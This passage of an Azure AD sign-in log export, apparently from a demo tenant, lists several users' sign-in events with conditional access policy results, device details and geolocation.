'5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f05c8354-7e46-4145-8055-705673901300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,f05c8354-7e46-4145-8055-705673901300,SigninLogs,Sucess,50.6406517,5.572050095
+911,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:41.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1ed67620-b507-4863-8a02-e76d15949669,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,MCAS Conditional Access Application Control,36238d04-e66d-48fc-a73e-69b0d827d794,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea327d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8d371308-4e1f-476f-97d6-c0ea327d1400,SigninLogs,Sucess,33.7984581,-84.38828278
+912,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:23.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",13087585-23e2-41d3-bc5e-408312364b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,13087585-23e2-41d3-bc5e-408312364b00,SigninLogs,Sucess,40.75891113,-73.97901917
+913,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:01.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,246c58df-9ced-4246-84c5-871fbb44ac2d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3b0e5c51-5aba-4adb-89c0-6eab4d921400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3b0e5c51-5aba-4adb-89c0-6eab4d921400,SigninLogs,Sucess,33.7984581,-84.38828278
+914,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:39.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,98643d5b-d98b-4b5e-9403-2d8a4f7695d5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",49d93d44-ab6a-4881-b533-762619301400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,49d93d44-ab6a-4881-b533-762619301400,SigninLogs,Sucess,50.6406517,5.572050095
+915,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:01.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,246c58df-9ced-4246-84c5-871fbb44ac2d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3b0e5c51-5aba-4adb-89c0-6eab4d921400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3b0e5c51-5aba-4adb-89c0-6eab4d921400,SigninLogs,Sucess,33.7984581,-84.38828278
+916,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:34.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7fd1845f-813b-4263-bbf5-ecbc83d1c64d,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f4c49c86-cb9e-4a04-9dcc-1dcdedce1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f4c49c86-cb9e-4a04-9dcc-1dcdedce1000,SigninLogs,Sucess,41.90428925,-85.99833679
+917,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:48.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,76fca1e7-e01d-497f-b0df-bc6a4e7b1131,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",4445394f-bc55-4988-8502-680d27a21400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,4445394f-bc55-4988-8502-680d27a21400,SigninLogs,Sucess,50.6406517,5.572050095
+918,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:01.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,edc4c676-5c7d-4952-b3e5-3217ca5c14b1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 